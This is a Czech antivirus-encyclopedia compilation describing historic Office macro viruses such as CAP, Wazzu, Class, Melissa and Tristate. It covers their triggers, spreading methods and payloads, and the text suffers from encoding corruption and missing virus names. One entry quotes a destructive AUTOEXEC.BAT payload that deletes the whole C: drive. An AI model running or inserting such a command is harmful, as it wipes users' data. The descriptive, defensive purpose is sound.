Popisy vir∙
Makroviry
Pokud nenφ jinak uvedeno, informace jsou p°elo₧eny z AVP Virus Encyclopedie (www.avp.ch/avpve).
Tento virus je zajφmav² jak svou stavbou, tak ·pornou snahou
Üφ°it se za vÜech okolnostφ a v ka₧dΘm prost°edφ.
Samotn² virus je tvo°en v podstat∞ jedin²m, pom∞rn∞
rozsßhl²m a komplikovan²m makrem, pojmenovan²m CAP (odtud
tedy pochßzφ i jmΘno viru). Ostatnφ makra, kterß s sebou
virus nosφ, majφ t∞lo bu∩ prßzdnΘ nebo obsahujφ pouze volßnφ
funkce z makra CAP.
Virus nejΦast∞ji doprovßzejφ tato modifikovanß makra:
AutoExec, AutoOpen, AutoClose,FileSave, FileSaveAs,
FileOpen, FileClose, FileTemplates, ToolsMacro.
Krom∞ toho virus prohledß menu prßv∞ infikovanΘho Wordu
a v p°φpad∞ pot°eby (t.j. v p°φpad∞, ₧e vßÜ Word pou₧φvß
lokalizovanΘ nßzvy vybran²ch polo₧ek) vytvo°φ dalÜφ makra
odpovφdajφcφ t∞mto polo₧kßm. VÜechna virovß makra s vyjφmkou
ToolsMacro jsou zakryptovßna a jejich komentß° zaΦφnß znaky F%.
Ke ztφ₧enφ vlastnφho odhalenφ vyu₧φvß CAP vynikajφcφ
mo₧nosti modifikovat samotn² Word. Dφky tomu nenφ pro virus
obtφ₧nΘ odstranit z menu Nßstroje (Tools) polo₧ky Makro
(Macro) a Vlastnφ (Customize). Polo₧ka èablony (Templates)
v menu Soubor (File) z∙stßvß, ale je nefunkΦnφ dφky jejφmu
p°i°azenφ k prßzdnΘmu makru.
Pom∞rn∞ znaΦnou pΘΦi v∞noval autor takΘ aktivnφ podpo°e
Üφ°enφ svΘho dφla. Virus obsahuje p°φkaz, kter² nastavφ
(pochopiteln∞ bez vaÜeho v∞domφ) automatickΘ uklßdßnφ
dokument∙ ka₧d²ch 10 minut.
Virus je dokonce schopen Üφ°enφ i v p°φpad∞, ₧e pou₧φvßte
k p°enosu dokument∙ formßt .RTF (Reach Text Format), kter²
nenφ schopen nΘst makra. Funkce ulo₧enφ souboru je toti₧
modifikovßna tak, aby i soubory, kterΘ uklßdßte jako RTF
m∞ly internφ strukturu Üablony a mohly tedy obsahovat makra.
CAP neobsahuje ₧ßdnΘ viditelnΘ projevy ani ·myslnou
Ükodlivou Φinnost, pomineme-li, ₧e z ka₧dΘho infikovanΘho
dokumentu odstranφ vÜechna makra, kterß tam byla p°ed jeho
nßstupem.
Virus pochßzφ z Venezuely, co₧ lze usoudit z komentß°e
obsa₧enΘho v hlavnφ funkci makra CAP:
C.A.P: Un virus social.. y ahora digital..
"j4cKy Qw3rTy" (jqw3rty@hotmail.com).
Venezuela, Maracay, Dic 1996.
P.D. Que haces gochito ?
Nunca seras Simon Bolivar.. Bolsa !
Zdroj: Grisoft software s.r.o. - v²robce antiviru AVG
Je to prvnφ makrovirus (WinWord), kter² se objevil v seznamu "in the wild".
Virus obsahuje 5 maker: AAAZAO, AAAZFS, AutoOpen, PayLoad, FileSaveAs.
Infikuje soubory p°i jejich uklßdßnφ (FileSaveAs).
V infikovanΘm dokumentu jsou texty:
see if we're already installed
iWW6IInstance
AAAZFS
AAAZAO
That's enough to prove my point
a dalÜφ. Souboru WINWORD6.INI (na infikovanΘm poΦφtaΦi) pak obsahuje:
WW6I=1
P°i prvnφm spuÜt∞nφ viru (p°i prvnφm otev°enφ infikovanΘho souboru) se objevφ
v tabulce (MessageBox) s Φφslicφ "1" a tlaΦφtkem OK.
|
K≤dovan² makrovirus. Obsahuje jen jedno makro AutoClose a infikuje soubory p°i jejich zavφrßnφ.
Prvnφho dne ka₧dΘho m∞sφce virus nφΦφ soubory a zobrazuje text (v tabulce message box):
MDMA_DMV
You are infected with MDMA_DMV.
Brought to you by MDMA (Many Delinquent Modern Anarchists).
Ve Windows virus ma₧e C:\SHMK soubor a p°episuje C:\AUTOEXEC.BAT s p°φkazy:
@echo off
deltree /y c:
@echo You have just been phucked over by a virus
V²sledkem jsou smazanΘ vÜechny soubory ve vÜech podadresß°φch.
Ve Windows NT virus ma₧e vÜechny soubory v hlavnφm adresß°i stejn∞ jako soubor C:\SHMK.
Na Macintoshi virus ma₧e soubory v systΘmovΘm adresß°i (?).
Pod jin²mi systΘmy (Windows 95) virus ma₧e C:\SHMK soubor a vÜechny soubory
*.HLP v adresß°i C:\WINDOWS. Virus nastavuje n∞kterΘ hlavnφ °etezce a ma₧e vÜechny
*.CPL soubory v adresß°i C:\WINDOWS\SYSTEM\.
K≤dovan² makrovirus. Obsahuje pouze jedno makro AutoOpen i infikuje globßlnφ Üablonu / dokumenty p°i
otevφrßnφ infikovan²m souborem / dokumentem.
Virus vytvß°φ poΦφtadlo v souboru WIN.INI:
[NPad328]
Compatibility=
P°i ka₧dΘ infekci virus zv²Üφ hodnotu poΦφtadla. Kdy₧ dosßhno poΦφtadlo hodnoty 23,
virus zobrazφ text v "status baru":
D0EUNPAD94, v.2.21, (c) Maret 1996, Bandung, Indonesia
Virus obsahuje text:
D0EUNPAD94, v.2.21, (c) Maret 1996, Bandung, Indonesia
Macro MsWord virus, multiplatform, multi versi
Tento makrovirus obsahuje jenom jedno makro AutoOpen. Infikuje Word dokumenty
p°i jejich otevφrßnφ a kopφruje svoje makra do globßlnφ Üablony (NORMAL.DOT), kdy₧ je
otev°en infikovan² dokument. Virus nenφ k≤dovßn a m∙₧e b²t snadno dektekovßn p°i
hledßnφ textu:
RndWorddo
wazzu do
RndWorddRgV
Po infekci dokumentu, virus vezme nßhodn∞ vybranΘ slovo z dokumentu a umφstφ ho
na op∞t nßhodn∞ zvolenou pozici. Toto virus opakuje maximßln∞ 3x v zßvislosti na poΦφtadle.
N∞kdy taky vklßdß do dokumentu na nßhodnΘ mφsto °etezec "wazzu" (op∞t v zßvislosti na poΦφtadle).
Virus obsahuje t°i podprogramy v jeho makru:
MAIN - hlavnφ rutina, kterß p°evezme kontrolu p°i spuÜt∞nφ AutoOpen makra.
Payload - tato rutina je volanß hlavnφ rutinou, vym∞≥uje slova a vklßdß °etezec "wazzu".
RndWord - tato rutina je volßna rutinou Payload. Nastavuje nßhodn∞ vybranou pozici v dokumentu.
Slova zam∞≥uje s pravd∞podobnostφ 1:5 a slovo "wazzu" vklßdß s pravd∞podobnostφ 1:4.
TaktΘ₧ obsahuje text:
< - - - - - - here 's the payload
Zajφmavostφ je, ₧e se tento virus objevil p°φmo na WWW strßnkßch firmy Microsoft (!!!)
a tak vzniklo ohromnΘ mno₧stvφ variant.
Rodina makrovir∙ pro Word 97....
W97M/Class.D
Aktivuje se ΦtrnßctΘho v m∞sφcφch Φerven a₧ prosinec.
V tento den vypisuje zprßvu:
I Think (Name of the current user) is a big stupid jerk!
VicodinES Loves You / Class.Poppy
Makrovirus taky n∞kdy zm∞nφ vlastnφka Wordu 97 na "Dr. Diet Mountain Dew".
W97M/Class.B
Makrovirus, kter² se podobß variant∞ Class.D. Zprßva, kterou vypisuje je vÜak mφrn∞
odliÜnß a navφc Class.B nem∞nφ vlastnφka licence.
W97M/Class.Q
Drobn∞ upravenß varianta Class.B.
Polymorfnφ makrovirus pro Word 97. VypouÜtφ VBScript virus (soubor C:\HAPPY.VBS), kter² napadß dalÜφ VBS soubory.
Krom∞ toho odesφlß jednu emailovou zprßvu autorovi viru (zprßva obsahuje IP adresu infikovanΘho souboru) na adresu avm@nym.alias.neta.
Druhou emailovou zprßvu odesφlß antivirovΘmu odbornφkovi (tuÜim, ₧e pracoval Φi pracuje ve Virus Bulletinu).
Makrovirus infikujφcφ dokumenty Wordu 97 a Üablonu NORMAL.DOT. Obsahuje pouze
jedno makro "Document_Close()" v modulu "ThisDocument" (jednß se tedy o virus °ady Class).
Makrovirus infikuje dokumenty p°i jejich uzavφrßnφ.
P°i infekci vypφnß makrovirus antivirovou ochranu Wordu a nastavφ automatickΘ uklßdßnφ zm∞n
do globßlnφ Üablony (NORMAL.DOT).
Makrovirus hledß soubor ETHAN.___ v hlavnφm adresß°i na disku C:. Pokud tam nenφ, vytvo°φ ho
a nakopφruje do n∞j svoje t∞lo (makro). Pokud infikovan² soubor obsahuje dalÜφ makra, nakopφruje je
do n∞j taky. Virus pou₧φvß tento soubor k infekci dalÜφch dokument∙ (ulo₧enß makra jsou p°ekopφrovßny
do prßv∞ infikovanΘho dokumentu).
Virus nastavuje souboru ETHAN.___ atributy System a Hidden. Virus taky hledß soubor C:\CLASS.SYS (vytvß°φ
ho makrovirus W97M/Class.A) a ma₧e ho.
V zßvislosti na generßtoru nßhodn²ch Φφsel virus m∞nφ informace o infikovanΘm dokumentu: nastavuje jeho nßzev
na "Ethan Frome", autora na "EW/LN/CB" a popis na "Ethan".
W97M/Ftip je jednoduchouΦk² worm, kter² se rozesφlß na 30 adres z ka₧dΘho adresß°e (tato Φßst k≤du je vykradena z viru W97M/Melissa). ZaslanΘ maily majφ subject "RE:" a text:
Chtel si ftipy, tak tady je mas!!! ;)))
[ _doplneno_skutecne_jmeno_uzivatele_ ]
---
Odchozφ zprßva neobsahuje viry.
Zkontrolovßno antivirov²m systΘmem AVG (http://www.grisoft.cz).
Verze: 6.0.219 / Virovß bßze: 103 - datum vydßnφ: 5.12.2000
Worm je p°ipojen v souboru ftip.doc.
┌speÜnΘ odeslßnφ mailu si poznaΦφ do registry:
KlφΦ: "HKLM\Software\Microsoft\Windows\CurrentVersion\i0nSt0rm"
Hodnota: "...by gl"
Zdrojßk zaΦφnß komentß°i:
' W97/2k.i0nSt0rm
' Code by gl_st0rm
Po zav°enφ infikovanΘho dokumentu zobrazφ s 1/3 pravd∞podobnostφ message box s hlaviΦkou:
Err0r! :->
a textem:
W97/2k.i0nSt0rm code by gl_st0rm
Zdroj: Grisoft software s.r.o. - v²robce antiviru AVG
Makrovirus pro Word 97. Svoje t∞lo umis¥uje do modulu "ThisDocument".
Marker si zapisuje do svΘho t∞la informace o infikovanΘm Wordu 97 (jmΘno u₧ivatele...).
Na zaΦßtku ka₧dΘho m∞sφce odeÜle nashromß₧d∞nΘ informace na FTP server (kter² je z°ejm∞ v dneÜnφ dob∞ ji₧ zruÜen²).
Relativn∞ jednoduch² makrovirus, kter² se dokß₧e Üφ°it pod Wordem z Office 97 a Office 2000. V prost°edφ Office 97
blokuje p°φstup k polo₧ce Makra v menu Nßstroje a zakß₧e Wordu ptßt se na potvrzenφ konverze dokumentu a
ulo₧enφ zm∞n v NORMAL.DOT.
V prost°edφ Office 2000 W97M/Melissa nastavφ antivirovou ochranu (Security level) na nejni₧Üφ mo₧nou hodnotu.
"Nejzßbavn∞jÜφ" je schopnost tohoto viru vyu₧φt instalovan² MS Outlook pro rozesφlßnφ infikovan²ch dokument∙.
Vytßhne si prvnφch padesßt adres z ka₧dΘho u₧ivatelskΘho adresß°e a odeÜle na n∞ mail se Subjectem:
Important Message From _doplneno_vase_jmeno_
a s tφmto obsahem:
Here is that document you asked for ...
don't show anyone else ;-)
Infikovan² dokument je p°ilo₧en k tΘto zprßv∞. Aby to bylo jeÜt∞ p∙vabn∞jÜφ, tak se W97M/Melissa neobt∞₧uje vytvo°enφm
n∞jakΘho novΘho dokumentu, ale poÜle ten, na kterΘm prßv∞ pracujete. Tak₧e vßÜ (mo₧nß celkem soukrom²) dokument
vzßp∞tφ obdr₧φ pßr set lidφ. Milß p°edstava, ₧e ?
Jakmile je rozesφlßnφ ukonΦeno, tak si Melissa do registry pro Office nastavφ klφΦ "Melissa?" na hodnotu "... by Kwyjibo"
a podle toho p°φÜt∞ poznß, ₧e vaÜe adresy u₧ obhospoda°ila a nemusφ se znovu namßhat.
Pokud p°i zavφrßnφ dokumentu odpovφda datum minut∞, tak W97M/Melissa vlo₧φ do vaÜeho textu odstaveΦek:
Twenty-two points, plus triple-word-score,
plus fifty points for using all my letters.
Game's over. I'm outta here.
Ve zdrojovΘm textu je jeÜt∞ tento komentß°:
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
Zdroj: Grisoft software s.r.o. - v²robce antiviru AVG
Makrovirus, obsahujφcφ dv∞ makra: AutoOpen, WININIT. Virus infikuje dokumenty p°i otvφrßnφ.
13.prosince vytvo°φ nov² dokument a vlo₧φ do n∞j zprßvu:
IMPORTAT NOTTICE!
HANSSI A. A. IS MARRIED WITH A LOSSER.
Makrovirus Üφ°φcφ se v dokumentech Microsoft Wordu 97. Ostatnφ dokumenty napadß p°i t°ech
r∙zn²ch udßlostech (otev°enφ, ulo₧enφ a zalo₧enφ dokumentu). Jedinou zajφmavostφ na tomto
makroviru je destrukΦnφ Φinnost. Popisovan² makrovirus toti₧ 13. prosince niΦφ vÜechny
soubory na disku C.
Zdroj: CHIP CD, VirovΘ novinky
Jednß se o "cross" - makrovirus, kter² infikuje n∞kolik souΦßstφ produktu Microsoft Office 97 - dokumenty Wordu, prezentace PowerPointu a tabulky Excelu.
Makrovirus se nijak viditeln∞ neprojevuje.
Makrovirus deaktivuje antivirovou ochranu Excelu a PowerPointu (p°es registry) a ochranu Wordu (pomocφ p°φkazu jazyka VBA).
Makrovirus obsahuje t°i procedury: pro Word - Document_Close(), Excel - Workbook_Deactivate(), PowerPoint - ActionHook(). JednotlivΘ
procedury se pak vyvolßvajφ podle toho, pod jak²m produktem jsou spuÜt∞ny.
Makroviry obsahujφ text:
"Tristate.A":
Triplicate v0.1 /1nternal
"Tristate.B":
Triplicate v0.11 /1nternal
"Tristate.C":
Triplicate v0.2 /1nternal
"Tristate.D":
Triplicate v0.21 /1nternal
Tento makrovirus infikuje excelovskΘ tabulky (XLS soubory). Obsahuje dv∞ makra: auto_open a check_files.
Popisovanß varinta se neprojevuje.
Upravenß verze makroviru pro Excel 97.